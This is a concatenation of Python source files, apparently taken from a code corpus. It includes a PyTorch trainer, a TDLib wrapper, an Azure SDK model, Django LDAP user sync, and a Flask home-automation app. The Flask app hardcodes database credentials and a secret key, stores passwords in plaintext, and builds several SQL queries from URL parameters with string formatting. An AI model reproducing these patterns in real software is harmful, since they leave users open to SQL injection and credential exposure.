Analysis/intanutil/data_to_result.py","file_name":"data_to_result.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312457932","text":"import time\nimport torch\nfrom torch.cuda import amp\nimport sys\nsys.path.append(\"./libs/utils\")\nfrom eval import AverageMeter, accuracy\nfrom torch.utils.tensorboard import SummaryWriter\n\n\ndef to_python_float(t):\n if hasattr(t, 'item'):\n return t.item()\n else:\n return t[0]\n \nclass Trainer:\n def __init__(self, model, optimizer, scheduler, criterion, device, config):\n self.model = model.to(device)\n self.optimizer = optimizer\n self.scheduler = scheduler\n self.criterion = criterion.to(device)\n self.scaler = amp.GradScaler() \n self.device = device\n self.config = config\n self.top1 = AverageMeter()\n self.t_losses = AverageMeter()\n self.v_losses = AverageMeter()\n self.writer = SummaryWriter(log_dir=\"./logs/\"+self.config.f_name)\n self.iter = 0\n \n def fit(self, train_dl, val_dl):\n torch.backends.cudnn.benchmark = True\n best_top1 = 0.0\n for i in range(self.config.n_epochs):\n start = time.time()\n self.train_one_epoch(train_dl)\n self.validation(val_dl)\n lr = self.optimizer.param_groups[0]['lr']\n self.log(f'[RESULT]: Epoch: {i+1}, train_loss: {self.t_losses.avg:.4f}, val_loss: {self.v_losses.avg:.5f}, top1: {self.top1.avg:.3f}, lr: {lr:.5f}, time: {(time.time() - start):.3f}')\n self.writer.add_scalar('train_loss', round(self.t_losses.avg, 5), i+1)\n self.writer.add_scalar('val_loss', round(self.v_losses.avg, 5), i+1)\n self.writer.add_scalar('top1_acc', round(self.top1.avg, 5), i+1)\n \n if best_top1 < self.top1.avg:\n best_top1 = self.top1.avg\n self.save(epoch=i+1, top1=self.top1.avg)\n self.save(epoch=self.config.n_epochs, top1=self.top1.avg, last=True)\n self.writer.close()\n def train_one_epoch(self, train_dl):\n self.model.train()\n self.t_losses.reset()\n itr_start = time.time()\n for img, target in train_dl:\n self.optimizer.zero_grad()\n with amp.autocast(enabled=True):\n pred = self.model(img.to(self.device))\n loss = self.criterion(pred, target.to(self.device))\n self.scaler.scale(loss).backward()\n self.scaler.step(self.optimizer)\n self.scaler.update()\n self.scheduler.step()\n self.t_losses.update(loss.item(), self.config.train_batch_size)\n \n #------------可視化------------\n if (self.iter % 100) == 0 :\n print(f'iter : {self.iter} time : {int(time.time() - itr_start)}sec')\n itr_start = time.time()\n self.iter += 1\n def validation(self, val_dl):\n self.model.eval()\n self.top1.reset()\n self.v_losses.reset()\n for img, target in val_dl:\n with amp.autocast(enabled=True):\n pred = self.model(img.to(self.device))\n loss = self.criterion(pred, target.to(self.device))\n [prec1] = accuracy(pred.data.cpu().float(), target.cpu().float(), topk=(1, ))\n self.top1.update(to_python_float(prec1), img.size(0))\n self.v_losses.update(loss.item(), self.config.val_batch_size)\n \n def save(self, epoch, top1, last=False):\n if last:\n l_or_b = '_last.bin'\n else:\n l_or_b = '_best.bin'\n torch.save({\n 'model_state_dict': self.model.state_dict(), \n 'top1': top1,\n 'epoch': epoch,\n }, self.config.weight_path + l_or_b)\n \n def log(self, message):\n if self.config.verbose:\n print(message)\n with open(self.config.log_path + '.txt', mode='a') as logger:\n logger.write(f'{message}\\n')","sub_path":"libs/Trainer/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"110468678","text":"from __future__ import annotations\n\nimport logging\nimport ctypes\nimport typing\nimport pathlib\nimport locale\nimport platform\nimport json\n\nimport attr\nimport pyhocon\n\nimport pytelegram_dl\nimport pytelegram_dl.constants as constants\n\n\nlogger = logging.getLogger(__name__)\n\n@attr.s(auto_attribs=True, frozen=True)\nclass TdlibConfiguration:\n\n database_directory:pathlib.Path = attr.ib()\n use_message_database:bool = attr.ib()\n use_secret_chats:bool = attr.ib()\n api_id:int = attr.ib()\n api_hash:str = attr.ib()\n enable_storage_optimizer:bool = attr.ib()\n system_language_code:str = attr.ib()\n device_model:str = attr.ib()\n system_version:str = attr.ib()\n application_version:str = attr.ib()\n library_path:pathlib.Path = attr.ib()\n tdlib_log_file_path:pathlib.Path = attr.ib()\n\n def get_tdlibparams_json_params(self) -> dict:\n\n d = {\n \"database_directory\": str(self.database_directory),\n \"use_message_database\": self.use_message_database,\n \"use_secret_chats\": self.use_secret_chats,\n \"api_id\": self.api_id,\n \"api_hash\": self.api_hash,\n \"system_language_code\": self.system_language_code,\n \"device_model\": self.device_model,\n \"system_version\": self.system_version,\n \"application_version\": self.application_version,\n \"enable_storage_optimizer\": self.enable_storage_optimizer}\n\n return d\n\n @staticmethod\n def init_from_config(config:pyhocon.config_tree.ConfigTree) -> TdlibConfiguration:\n\n try:\n\n c = config.get_config(\"pytelegram_dl.tdlib_configuration\")\n\n tmp_path = pathlib.Path(c.get_string(\"database_directory_path\")).resolve()\n tmp_msgdb = c.get_bool(\"use_message_database\")\n tmp_secretchat = c.get_bool(\"use_secret_chats\")\n tmp_storageopt = c.get_bool(\"enable_storage_optimizer\")\n\n tmp_authid = c.get_int(\"auth.api_id\")\n tmp_authhash = c.get_string(\"auth.api_hash\")\n\n # use defaultlocale for now becuase of https://bugs.python.org/issue38805\n tmp_lang = locale.getdefaultlocale()[0]\n tmp_model = \"Desktop\"\n tmp_sysver = f\"{platform.system()} {platform.version()}\"\n tmp_ver = f\"pytelegram_dl {pytelegram_dl.__version__} / Python {platform.python_version()}\"\n tmp_lpath = pathlib.Path(config.get_string(\"pytelegram_dl.library_path\"))\n tmp_tdlogpath = pathlib.Path(config.get_string(\"pytelegram_dl.tdlib_log_file\"))\n\n final_cfg = TdlibConfiguration(\n database_directory=tmp_path,\n use_message_database=tmp_msgdb,\n use_secret_chats=tmp_secretchat,\n api_id=tmp_authid,\n api_hash=tmp_authhash,\n enable_storage_optimizer=tmp_storageopt,\n system_language_code=tmp_lang,\n device_model=tmp_model,\n system_version=tmp_sysver,\n application_version=tmp_ver,\n library_path=tmp_lpath,\n tdlib_log_file_path=tmp_tdlogpath)\n\n logger.debug(\"new TdlibConfiguration from configuration: `%s`\", final_cfg)\n return final_cfg\n\n\n except pyhocon.exceptions.ConfigException as e:\n\n logger.exception(\"TdlibConfiguration.init_from_config: error when reading needed values from configuration\")\n raise e\n except Exception as e:\n logger.exception(\"TdlibConfiguration.init_from_config: unexpected error\")\n raise e\n\n\n@attr.s(auto_attribs=True, frozen=True)\nclass TdlibHandle:\n\n\n tdlib_shared_library:ctypes.CDLL = attr.ib()\n\n tdlib_config:TdlibConfiguration = attr.ib()\n\n # these are all of these types:\n #\n # ._FuncPtr'>\n # not sure how to represent that with typing.Callable\n func_client_create:typing.Any = attr.ib()\n func_client_receive:typing.Any = attr.ib()\n func_client_send:typing.Any = attr.ib()\n func_client_execute:typing.Any = attr.ib()\n func_client_destroy:typing.Any = attr.ib()\n func_set_log_fatal_error_callback:typing.Any = attr.ib()\n\n # type for passing in a python function to the tdlib function set+log_fatal_error_callback\n fatal_error_callback_type = ctypes.CFUNCTYPE(None, ctypes.c_char_p)\n\n # gets set afterwards\n tdlib_client:typing.Any = attr.ib(default=None)\n\n @staticmethod\n def fatal_error_callback(error_message:str) -> None:\n logger.error(\"TDLib fatal error: `%s`\", error_message)\n\n\n @staticmethod\n def init_from_config(tdlib_config:TdlibConfiguration) -> TdlibHandle:\n\n try:\n\n tdjson = ctypes.CDLL(str(tdlib_config.library_path))\n\n\n # load TDLib functions from shared library\n td_json_client_create = tdjson.td_json_client_create\n td_json_client_create.restype = ctypes.c_void_p\n td_json_client_create.argtypes = []\n\n td_json_client_receive = tdjson.td_json_client_receive\n td_json_client_receive.restype = ctypes.c_char_p\n td_json_client_receive.argtypes = [ctypes.c_void_p, ctypes.c_double]\n\n td_json_client_send = tdjson.td_json_client_send\n td_json_client_send.restype = None\n td_json_client_send.argtypes = [ctypes.c_void_p, ctypes.c_char_p]\n\n td_json_client_execute = tdjson.td_json_client_execute\n td_json_client_execute.restype = ctypes.c_char_p\n td_json_client_execute.argtypes = [ctypes.c_void_p, ctypes.c_char_p]\n\n td_json_client_destroy = tdjson.td_json_client_destroy\n td_json_client_destroy.restype = None\n td_json_client_destroy.argtypes = [ctypes.c_void_p]\n\n fatal_error_callback_type = ctypes.CFUNCTYPE(None, ctypes.c_char_p)\n\n td_set_log_fatal_error_callback = tdjson.td_set_log_fatal_error_callback\n td_set_log_fatal_error_callback.restype = None\n td_set_log_fatal_error_callback.argtypes = [TdlibHandle.fatal_error_callback_type]\n\n # set the callback\n c_on_fatal_error_callback = fatal_error_callback_type(TdlibHandle.fatal_error_callback)\n td_set_log_fatal_error_callback(c_on_fatal_error_callback)\n\n res = TdlibHandle(\n tdlib_shared_library=tdjson,\n tdlib_config=tdlib_config,\n tdlib_client=None, # no client yet\n func_client_create=td_json_client_create,\n func_client_receive=td_json_client_receive,\n func_client_send=td_json_client_send,\n func_client_execute=td_json_client_execute,\n func_client_destroy=td_json_client_destroy,\n func_set_log_fatal_error_callback=td_set_log_fatal_error_callback)\n\n logger.debug(\"new TdlibHandle from configuration: `%s`\", res)\n return res\n\n except Exception as e:\n logger.exception(\"TdlibHandle.init_with_configuration: unknown exception\")\n raise e\n\n\n def create_client(self) -> TdlibHandle:\n ''' creates a client and returns a new instance of TdlibHandle with the new client\n '''\n\n if self.tdlib_client is not None:\n raise Exception(\"TdlibHandle.create_client called when a client already exists\")\n\n logger.info(\"creating tdlib client\")\n new_client = self.func_client_create()\n logger.info(\"tdlib client created successfully: `%s`\", new_client)\n\n return attr.evolve(self, tdlib_client=new_client)\n\n def send(self, json_to_send) -> None:\n\n if self.tdlib_client is None:\n raise Exception(\"TdlibHandle.send called when no client has been created\")\n\n logger.info(\"tdlib client send called with: `%s`\", json_to_send)\n json_str = json.dumps(json_to_send)\n json_bytes = json_str.encode(\"utf-8\")\n\n self.func_client_send(self.tdlib_client, json_bytes)\n logger.info(\"tdlib client send called successfully\")\n\n def execute(self, json_to_send) -> dict:\n\n if self.tdlib_client is None:\n raise Exception(\"TdlibHandle.send called when no client has been created\")\n\n logger.info(\"tdlib client execute called with: `%s`\", json_to_send)\n json_str = json.dumps(json_to_send)\n json_bytes = json_str.encode(\"utf-8\")\n\n res = self.func_client_execute(self.tdlib_client, json_bytes)\n logger.info(\"tdlib client execute called successfully: `%s`\", res)\n\n # result is None if the request can't be parsed\n if res is not None:\n return json.loads(res)\n else:\n return res\n\n def receive(self) -> dict:\n\n if self.tdlib_client is None:\n raise Exception(\"TdlibHandle.receive called when no client has been created\")\n\n logger.info(\"tdlib client receive called\")\n res = self.func_client_receive(self.tdlib_client, constants.TDLIB_CLIENT_RECEIVE_TIMEOUT)\n logger.info(\"tdlib client receive called successfully, result: `%s`\", res)\n\n # result is None if the timeout expired\n if res is not None:\n return json.loads(res)\n else:\n return res\n\n\n def destroy_client(self) -> TdlibHandle:\n ''' destroys the client and returns a new instance of TdlibHandle with the\n client removed\n '''\n\n logger.info(\"destroying tdlib client\")\n self.func_client_destroy(self.tdlib_client)\n logger.info(\"tdlib client destroyed successfully\")\n return attr.evolve(self, tdlib_client=None)","sub_path":"pytelegram_dl/tdlib.py","file_name":"tdlib.py","file_ext":"py","file_size_in_byte":9587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"111225759","text":"# coding=utf-8\n# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# coding: utf-8\n# pylint: skip-file\nfrom msrest.serialization import Model\n\n\nclass ArtifactSource(Model):\n \"\"\"Properties of an artifact source.\n\n :param display_name: The artifact source's display name.\n :type display_name: str\n :param uri: The artifact source's URI.\n :type uri: str\n :param source_type: The artifact source's type. Possible values include:\n 'VsoGit', 'GitHub'\n :type source_type: str or :class:`SourceControlType\n `\n :param folder_path: The folder containing artifacts.\n :type folder_path: str\n :param arm_template_folder_path: The folder containing Azure Resource\n Manager templates.\n :type arm_template_folder_path: str\n :param branch_ref: The artifact source's branch reference.\n :type branch_ref: str\n :param security_token: The security token to authenticate to the artifact\n source.\n :type security_token: str\n :param status: Indicates if the artifact source is enabled (values:\n Enabled, Disabled). Possible values include: 'Enabled', 'Disabled'\n :type status: str or :class:`EnableStatus\n `\n :param created_date: The artifact source's creation date.\n :type created_date: datetime\n :param provisioning_state: The provisioning status of the resource.\n :type provisioning_state: str\n :param unique_identifier: The unique immutable identifier of a resource\n (Guid).\n :type unique_identifier: str\n :param id: The identifier of the resource.\n :type id: str\n :param name: The name of the resource.\n :type name: str\n :param type: The type of the resource.\n :type type: str\n :param location: The location of the resource.\n :type location: str\n :param tags: The tags of the resource.\n :type tags: dict\n \"\"\"\n\n _attribute_map = {\n 'display_name': {'key': 'properties.displayName', 'type': 'str'},\n 'uri': {'key': 'properties.uri', 'type': 'str'},\n 'source_type': {'key': 'properties.sourceType', 'type': 'str'},\n 'folder_path': {'key': 'properties.folderPath', 'type': 'str'},\n 'arm_template_folder_path': {'key': 'properties.armTemplateFolderPath', 'type': 'str'},\n 'branch_ref': {'key': 'properties.branchRef', 'type': 'str'},\n 'security_token': {'key': 'properties.securityToken', 'type': 'str'},\n 'status': {'key': 'properties.status', 'type': 'str'},\n 'created_date': {'key': 'properties.createdDate', 'type': 'iso-8601'},\n 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},\n 'unique_identifier': {'key': 'properties.uniqueIdentifier', 'type': 'str'},\n 'id': {'key': 'id', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n 'location': {'key': 'location', 'type': 'str'},\n 'tags': {'key': 'tags', 'type': '{str}'},\n }\n\n def __init__(self, display_name=None, uri=None, source_type=None, folder_path=None, arm_template_folder_path=None, branch_ref=None, security_token=None, status=None, created_date=None, provisioning_state=None, unique_identifier=None, id=None, name=None, type=None, location=None, tags=None):\n self.display_name = display_name\n self.uri = uri\n self.source_type = source_type\n self.folder_path = folder_path\n self.arm_template_folder_path = arm_template_folder_path\n self.branch_ref = branch_ref\n self.security_token = security_token\n self.status = status\n self.created_date = created_date\n self.provisioning_state = provisioning_state\n self.unique_identifier = unique_identifier\n self.id = id\n self.name = name\n self.type = type\n self.location = location\n self.tags = tags\n","sub_path":"src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/sdk/devtestlabs/models/artifact_source.py","file_name":"artifact_source.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629709146","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.conf import settings\nimport ldap\n\n\ndef sync_ldap_users():\n \"\"\"\n Sync users from ldap to this app's database\n\n This function does not:\n * Delete users deleted in ldap from app's database\n\n This function expects:\n * Users have valid uid entry\n * Users might have mail entry\n \"\"\"\n l = ldap.initialize(settings.AUTH_LDAP_SERVER_URI)\n l.simple_bind_s(settings.AUTH_LDAP_BIND_DN, settings.AUTH_LDAP_BIND_PASSWORD)\n ldapusers = l.search_s(settings.AUTH_LDAP_USERS_DN, \\\n ldap.SCOPE_ONELEVEL, \\\n \"cn=*\", \\\n attrlist=[\"uid\", \"mail\"])\n l.unbind()\n\n for ldapuser in ldapusers:\n uid = ldapuser[1][\"uid\"][0].decode(\"utf-8\")\n\n # Email field might be empty\n try:\n email = ldapuser[1][\"mail\"][0].decode(\"utf-8\")\n except KeyError:\n email = \"\"\n\n try:\n userobj = _get_user(uid)\n userobj.email = email\n userobj.save()\n except User.DoesNotExist:\n pass\n\n\ndef _get_user(username):\n \"\"\"\n Get User object from app's database or from ldap if it doesn't exist. Throw\n User.DoesNotExist if it doesn't exist in either one\n \"\"\"\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist:\n l = ldap.initialize(settings.AUTH_LDAP_SERVER_URI)\n l.simple_bind_s(settings.AUTH_LDAP_BIND_DN, settings.AUTH_LDAP_BIND_PASSWORD)\n \n ldapuser = l.search_s(settings.AUTH_LDAP_USERS_DN, \\\n ldap.SCOPE_ONELEVEL, \\\n \"uid={}\".format(username))\n l.unbind()\n\n if len(ldapuser) != 0:\n user = User.objects.create_user(username=username)\n else:\n raise User.DoesNotExist\n\n \n return user\n\n\nclass UserProfile(models.Model):\n \"\"\"\n Needed for additional functionality of users.\n \"\"\"\n user = models.OneToOneField(User, primary_key=True)\n\n @property\n def balance(self):\n \"\"\"\n Property that calculates user's current balance from transaction\n objects.\n\n Example usage:\n balance = foo.userprofile.balance\n \"\"\"\n transactions = Transaction.objects.filter(user=self.user)\n money = 0\n for transaction in transactions:\n money += transaction.amount\n\n return money\n\n def __str__(self):\n return str(self.user.id) or \"\"\n\n\n@receiver(post_save, sender=User)\ndef handle_user_save(sender, instance, created, **kwargs):\n # Userprofile isn't automatically created when creating user\n if created:\n UserProfile.objects.create(user=instance)\n\n\nclass Transaction(models.Model):\n \"\"\"\n Event where money goes into user's account (positive amount, user tops up\n their account)\n or goes away from user's account (negative amount, user buys something)\n\n DecimalField should be safe unlike floats\n \"\"\"\n user = models.ForeignKey(User)\n amount = models.DecimalField(decimal_places=2, max_digits=7)\n timestamp = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return str(self.timestamp) or \"\"\n\n","sub_path":"askipiikki/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417012601","text":"from flask import Flask, render_template, request, redirect, url_for, session\nfrom flask_mysqldb import MySQL\nimport MySQLdb.cursors\n\napp = Flask(__name__)\napp.secret_key = '_sbDdEOVwmMzzbn7eROWxg'\napp.config['MYSQL_HOST'] = 'sailasercom.ipagemysql.com'\napp.config['MYSQL_USER'] = 'homeauto'\napp.config['MYSQL_PASSWORD'] = 'Home@123'\napp.config['MYSQL_DB'] = 'home_auto'\nmysql = MySQL(app)\n\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n if 'username' in session:\n username = session['username']\n if session['username'] != \"admin\":\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT COUNT(*) FROM devices WHERE user_id=%s\", (session['id'],))\n property_count = cursor.fetchall()\n return render_template(\"index.html\", user=session['username'],count=property_count)\n else:\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT COUNT(*) FROM users\")\n property_count = cursor.fetchall()\n return render_template(\"index11.html\", count=property_count)\n elif request.method == 'POST' and 'username' in request.form and 'password' in request.form:\n username1 = request.form['username']\n password1 = request.form['password']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM users WHERE username = %s AND password = %s', (username1, password1))\n account = cursor.fetchone()\n if account['username']==\"admin\":\n session['loggedin'] = True\n session['id'] = account['id']\n session['username'] = account['username']\n cursor.execute(\"SELECT COUNT(*) FROM users\")\n property_count = cursor.fetchall()\n return render_template(\"index11.html\", count=property_count)\n elif account['username'] != \"admin\":\n session['loggedin'] = True\n session['id'] = account['id']\n session['username'] = account['username']\n cursor.execute(\"SELECT COUNT(*) FROM devices WHERE user_id=%s\", (account['id'],))\n property_count = cursor.fetchall()\n return render_template(\"index.html\", user=session['username'], count=property_count)\n else:\n msg = 'Incorrect username/password!'\n return \"Page did not load\"\n else:\n return render_template(\"page-login.html\")\n\n@app.route(\"/insertredir\")\ndef ins1():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM home_devices WHERE user_id=%s\", (session['id'],))\n result = cursor.fetchall()\n return render_template(\"add_device.html\", len=len(result), print=result)\n\n@app.route('/addrules')\ndef hdform():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM devices WHERE user_id=%s\",(session['id'],))\n result = cursor.fetchall()\n cursor.execute(\"SELECT * FROM home_devices WHERE user_id=%s\", (session['id'],))\n result1 = cursor.fetchall()\n return render_template(\"add_rules.html\", string2=result, len=len(result), string3=result1, len1=len(result1))\n\n@app.route('/manageusers')\ndef viewu():\n if session[\"username\"] == \"admin\":\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM users\")\n result1 = cursor.fetchall()\n return render_template(\"view_users.html\", result1 = result1, len=len(result1))\n else:\n return \"You are not admin\"\n\n@app.route('/addrulestodb', methods = ['GET','POST'])\ndef artdb():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n fvariable = request.form['device']\n svariable = request.form['appl']\n con = request.form['con']\n cursor.execute(\"SELECT * FROM devices WHERE device=%s\",(fvariable,))\n r1 = cursor.fetchall()\n cursor.execute(\"SELECT * FROM home_devices WHERE dname=%s\",(svariable,))\n r2 = cursor.fetchall()\n r11 = r1[0]['id']\n r22 = r2[0]['id']\n cursor.execute(\"INSERT INTO conditions(`user_id`, `imid`, `amid`, `condition`) VALUES(%s, %s, %s, %s)\", (session['id'], r11, r22, con))\n mysql.connection.commit()\n return redirect(url_for('viewr'))\n\n@app.route('/homedevice', methods = ['GET','POST'])\ndef ahd():\n if request.method == 'POST' and 'hdevice' in request.form:\n hdevice = request.form['hdevice']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"INSERT INTO `home_devices`(`user_id`, `dname`) VALUES (%s, %s)\", (session['id'], hdevice))\n return redirect(url_for('viewd'))\n\n@app.route(\"/view\")\ndef viewd():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM devices WHERE user_id=%s\", (session['id'],))\n result = cursor.fetchall()\n return render_template(\"view_device.html\", len=len(result), string1=result, user=session['username'])\n\n@app.route('/insert', methods = ['GET','POST'])\ndef ins():\n if request.method == 'POST' and 'device' in request.form and 'ip' in request.form:\n device = request.form['device']\n ip = request.form['ip']\n mac = request.form['mac']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"INSERT INTO `devices`(`user_id`, `device`, `mac`, `ip`) VALUES (%s, %s, %s, %s)\", (session['id'], device, mac, ip))\n mysql.connection.commit()\n cursor.close()\n return redirect(url_for('viewd'))\n else:\n return str(session['id'])\n\n@app.route('/edit/')\ndef ed(editid):\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM `devices` WHERE `id`=%s\" %editid,)\n resultedit = cursor.fetchall()\n return render_template(\"edit.html\", newvalue=resultedit)\n\n@app.route('/update/', methods = ['GET','POST'])\ndef up(editid1):\n device = request.form['device']\n ip = request.form['ip']\n mac = request.form['mac']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"UPDATE `devices` SET `device` = %s, `mac` = %s, `ip` = %s WHERE `id` = %s\", (device, mac, ip, editid1))\n mysql.connection.commit()\n return redirect(url_for('viewd'))\n\n@app.route('/delete/')\ndef delete(delid):\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"DELETE FROM `devices` WHERE id=%s\" %delid)\n return redirect(url_for('viewd'))\n\n@app.route('/viewrules')\ndef viewr():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"select conditions.id, devices.device, home_devices.dname, conditions.condition from conditions \"\n \"INNER JOIN devices on conditions.imid = devices.id INNER JOIN home_devices on conditions.amid = \"\n \"home_devices.id WHERE devices.user_id=%s;\", (session['id'],))\n result = cursor.fetchall()\n return render_template(\"view_rules.html\", result = result, len = len(result))\n\n@app.route('/ruleupview/', methods = ['GET','POST'])\ndef ruleup(editid):\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM devices WHERE user_id=%s\", (session['id'],))\n result = cursor.fetchall()\n cursor.execute(\"SELECT * FROM home_devices WHERE user_id=%s\", (session['id'],))\n result1 = cursor.fetchall()\n cursor.execute(\"SELECT * FROM conditions WHERE id=%s\" %editid)\n result2 = cursor.fetchall()\n return render_template(\"edit_rules.html\", result=result, len=len(result), result1=result1, len1=len(result1), result2=result2, len2=len(result2))\n\n@app.route('/updaterules/', methods = ['GET','POST'])\ndef uprules(editid1):\n device = request.form['device']\n appl = request.form['appl']\n con = request.form['con']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM devices WHERE device=%s\", (device,))\n r1 = cursor.fetchall()\n cursor.execute(\"SELECT * FROM home_devices WHERE dname=%s\", (appl,))\n r2 = cursor.fetchall()\n r11 = r1[0]['id']\n r22 = r2[0]['id']\n cursor.execute(\"UPDATE `conditions` SET `user_id` = %s, `imid` = %s, `amid` = %s, `condition` = %s WHERE `id` = %s\", (session['id'], r11, r22, con, editid1))\n mysql.connection.commit()\n return redirect(url_for('viewr'))\n\n@app.route('/delrule/')\ndef delr(delid):\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"DELETE FROM `conditions` WHERE id=%s\" % delid)\n return redirect(url_for('viewr'))\n@app.route('/login/logout')\ndef logout():\n session.pop('loggedin', None)\n session.pop('id', None)\n session.pop('username', None)\n return redirect(url_for('login'))\n\n#################################################################admin panel#################################################################\n@app.route('/adminedit/')\ndef aedit(editid):\n if session['username'] == \"admin\":\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM `users` WHERE `id`=%s\" % editid, )\n resultedit = cursor.fetchall()\n return render_template(\"admin_edit.html\", newvalue=resultedit)\n else:\n return render_template(\"page-error-403.html\")\n\n@app.route('/adminupdate/', methods = ['GET','POST'])\ndef aupdate(editid):\n if session['username'] == \"admin\":\n username = request.form['username']\n email = request.form['email']\n password = request.form['password']\n birthdate = request.form['birthdate']\n gender = request.form['gender']\n device_id = request.form['device_id']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"UPDATE `users` SET `username` = %s, `email` = %s, `password` = %s, `birthdate` = %s, `gender` = %s, `device_id` = %s WHERE `id` = %s\", (username, email, password, birthdate, gender, device_id, editid))\n mysql.connection.commit()\n return redirect(url_for('viewu'))\n else:\n return render_template(\"page-error-403.html\")\n\n@app.route('/adminadduser1', methods=['GET', 'POST'])\ndef adadd1():\n if session['username'] == \"admin\":\n return render_template(\"admin_add_user.html\")\n else:\n return render_template(\"page-error-403.html\")\n\n@app.route('/adminadduser2', methods = ['GET','POST'])\ndef adadd2():\n if session['username'] == 'admin':\n username = request.form['username']\n email = request.form['email']\n password = request.form['password']\n birthdate = request.form['birthdate']\n gender = request.form['gender']\n device_id = request.form['device_id']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"INSERT INTO `users`(`username`, `email`, `password`, `birthdate`, `gender`, `device_id`) VALUES (%s, %s, %s, %s, %s, %s)\",(username, email, password, birthdate, gender, device_id,))\n mysql.connection.commit()\n return redirect(url_for('viewu'))\n else:\n return render_template(\"page-error-403.html\")\n\n@app.route('/admindelete/')\ndef adelete(delid):\n if session['username'] == \"admin\":\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"DELETE FROM `users` WHERE id=%s\" % delid)\n return redirect(url_for('viewu'))\n else:\n return render_template(\"page-error-403.html\")\n#################################################################admin panel over#################################################################\n\nif __name__ == '__main__':\n app.run(debug = True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"428093258","text":"#python program to check if number is prime or not#\n\ndef main():\n \n num = int(input(\"Enter a number: \"))\n if num > 1:\n # check for factors\n for i in range(2,num):\n if (num % i) == 0:\n print(num,\"is not a prime number\\n\")\n #print(i,\"times\",num//i,\"is\",num)\n break\n else:\n print(num,\"is a prime number\\n\")\n \n # if input number is less than\n # or equal to 1, it is not prime\n else:\n print(num,\"is not a prime number\\n\")\n\nif __name__ == \"__main__\":\n while True:\n main()\n\n\n\n","sub_path":"5_prime_nt.py","file_name":"5_prime_nt.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"86383212","text":"import numpy as np\nimport os\n\ndef get_fps(video_name):\n fps = 30\n with open(os.path.join('ActivityNet1.3-Annotations', 'misc_fps.txt'), 'r') as f:\n for line in f:\n line = line.replace('\\n', '').split(' ')\n if line[0] == video_name:\n fps = float(line[1])\n break\n return fps\n\n\n#a = np.load('ActivityNet1.2-Annotations/labels_all.npy', allow_pickle=True)\n#b = np.load('ActivityNet1.2-Annotations/labels.npy', allow_pickle=True)\n\n#for i, j in zip(a, b):\n# if not i == j:\n# print(i, j)\n\n# a = np.load('labels_all.npy', allow_pickle=True)\n#\n#print('a')\n\n# fps_sum = 0\n# count = 0\n# with open(os.path.join(\"data_list\", \"anet1.3_val_fps.txt\"), 'r') as f:\n# for line in f:\n# line = line.replace('\\n', '').split(' ')\n# fps_sum += float(line[1])\n# count += 1\n# print(fps_sum / count)\n\n\n# def gen_classlist():\n# output = []\n# with open(os.path.join(\"data_list\", \"anet13_class.txt\"), 'r') as f:\n# for line in f:\n# class_name = line.replace('\\n', '').split(' ')[1]\n# # class_name = np.array(class_name)\n# output.append(class_name)\n# output = np.array(output)\n# np.save(os.path.join(\"ActivityNet1.3-Annotations\", \"classlist.npy\"), output)\n# print('a')\n#\n# if __name__ == '__main__':\n# 